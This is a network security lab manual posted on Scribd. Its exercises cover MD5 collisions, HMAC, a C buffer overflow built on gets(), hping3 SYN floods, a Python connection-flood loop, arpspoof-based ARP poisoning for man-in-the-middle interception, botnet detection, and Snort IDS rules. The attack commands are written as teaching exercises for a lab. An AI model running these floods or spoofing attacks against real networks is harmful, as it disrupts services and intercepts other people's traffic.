Scribd
Upload
50 views10 pages

Network Security Lab Manual

The document outlines a series of network security lab exercises, including MD5 hash collision demonstration, computing MAC and HMAC, buffer overflow attack, DoS and DDoS simulation, ARP poisoning, botnet detection, and Snort IDS installation and configuration. Each lab includes aims, requirements, procedures, expected outputs, and results, providing practical experience in various security concepts and techniques. The labs utilize programming languages such as Python and C, along with tools like Snort and Hping3.

Uploaded by

karakmurak742
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
50 views10 pages

Network Security Lab Manual

The document outlines a series of network security lab exercises, including MD5 hash collision demonstration, computing MAC and HMAC, buffer overflow attack, DoS and DDoS simulation, ARP poisoning, botnet detection, and Snort IDS installation and configuration. Each lab includes aims, requirements, procedures, expected outputs, and results, providing practical experience in various security concepts and techniques. The labs utilize programming languages such as Python and C, along with tools like Snort and Hping3.

Uploaded by

karakmurak742
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 10

NETWORK SECURITY LAB MANUAL

Lab 1: MD5 Hash Collision Demonstration


Aim:
To demonstrate two different certificates/files producing the same MD5 hash.

Requirements:
 Python
 hashlib library
 Example MD5 collision files (e.g., from
https://www.mscs.dal.ca/~selinger/md5collision/)

Procedure:
1. Download msg1.bin and msg2.bin.
2. Use Python to compute and compare hashes.

Sample Code:
python
import hashlib
def get_md5_hash(file):
with open(file, 'rb') as f:
return hashlib.md5(f.read()).hexdigest()
print("MD5 of msg1.bin:", get_md5_hash("msg1.bin"))
print("MD5 of msg2.bin:", get_md5_hash("msg2.bin"))

Expected Output:
Both files will output the same MD5 hash value, demonstrating a collision.

Result:
Successfully demonstrated MD5 hash collision using two files.
Lab 2: Computing MAC, HASH, and HMAC
Aim:
To compute MAC, HASH (MD5, SHA), and HMAC for sample messages.

Requirements:
 Python
 hashlib, hmac

Procedure:
python
import hashlib
import hmac
message = b"NetworkSecurityLab"
key = b"secretkey"
# Hash
print("MD5:", hashlib.md5(message).hexdigest())
print("SHA256:", hashlib.sha256(message).hexdigest())
# HMAC
h = hmac.new(key, message, hashlib.sha256)
print("HMAC:", h.hexdigest())

Expected Output:
Hash and HMAC values for the given message.

Result:
Successfully computed HASH and HMAC values.
Lab 3: Buffer Overflow Attack
Aim:
To demonstrate a basic buffer overflow vulnerability and exploit.

Requirements:
 C program
 Linux system
 gcc compiler

Procedure:
c
#include <stdio.h>
#include <string.h>
void secret() {
printf("You entered the secret function!\n");
}
void vulnerable() {
char buffer[64];
gets(buffer); // vulnerable to overflow
}
int main() {
vulnerable();
return 0;
}
Steps:
1. Compile with gcc -fno-stack-protector -z execstack -o overflow overflow.c
2. Use crafted input to overwrite return address.
Expected Output:
Redirection to the secret() function.

Result:
Buffer overflow successfully exploited.

Lab 4: Denial-of-Service (DoS) and DDoS Simulation


Aim:
To simulate DoS and DDoS attacks using tools.

Requirements:
 Tools: LOIC, Hping3, or custom Python script

Procedure (DoS using hping3):


bash
sudo hping3 -S --flood -V -p 80 <target-ip>
Procedure (Python DoS):
python
CopyEdit
import socket

target = "127.0.0.1"
port = 80

for i in range(1000):
s = socket.socket()
s.connect((target, port))
s.send(b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n")
Expected Output:
Server slows down or becomes unresponsive.
Result:
DoS and DDoS attack simulation completed.

Lab 5: ARP Poisoning and Man-in-the-Middle (MITM)


Aim:
To implement ARP spoofing and perform a MITM attack.
Requirements:
 Kali Linux
 Tools: arpspoof, ettercap
Procedure:
bash
CopyEdit
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# Spoof ARP
arpspoof -i eth0 -t <victim-ip> <gateway-ip>
Expected Output:
MITM achieved; victim’s traffic is routed through attacker.
Result:
ARP spoofing and MITM demonstrated successfully.

Lab 6: Botnet Attack Detection Using Public Dataset


Aim:
To detect botnet traffic using public datasets (e.g., CTU-13).
Requirements:
 Python
 Dataset from https://www.stratosphereips.org/datasets-ctu13
 Tools: pandas, scikit-learn
Procedure:
1. Load dataset
2. Preprocess data
3. Train ML model
Sample Code Snippet:
python
CopyEdit
import pandas as pd
from sklearn.ensemble import RandomForestClassifier

df = pd.read_csv("ctu13_dataset.csv")
X = df.drop("label", axis=1)
y = df["label"]

model = RandomForestClassifier()
model.fit(X, y)

print("Accuracy:", model.score(X, y))


Expected Output:
Botnet traffic detected using ML.
Result:
Botnet detection using dataset implemented.
Lab 7: Install Snort Intrusion Detection System
Aim:
To install and configure Snort as an IDS.
Requirements:
 Ubuntu/Kali
 Internet connection
Procedure:
bash
CopyEdit
sudo apt update
sudo apt install snort
Configuration:
 Edit /etc/snort/snort.conf
 Set HOME_NET
Expected Output:
Snort runs in IDS mode.
Result:
Snort successfully installed and configured.

Lab 8: Implement Firewall Rules using Snort


Aim:
To write Snort rules to block/filter malicious traffic.
Requirements:
 Snort installed
Sample Rule:
bash
CopyEdit
alert tcp any any -> any 80 (msg:"HTTP Access Detected"; sid:1000001; rev:1;)
Steps:
1. Add rule to local.rules
2. Update snort.conf
3. Run snort
bash
CopyEdit
snort -A console -q -c /etc/snort/snort.conf -i eth0
Expected Output:
Alerts generated when HTTP traffic is detected.
Result:
Firewall rules using Snort implemented successfully.

Lab 9: Generate and Detect Network Attack Using Snort


Aim:
To simulate a network attack and detect it using Snort.
Tools Required:
 Snort
 Attack Tool (e.g., hping3)
Procedure:
1. Launch a simulated TCP SYN flood using:
bash
CopyEdit
hping3 -S --flood -p 80 <victim-ip>
2. Monitor with Snort in real-time.
bash
CopyEdit
snort -A console -q -c /etc/snort/snort.conf -i eth0
Expected Output:
Snort detects and logs the SYN flood attack.
Result:
Network attack detected using Snort.

You might also like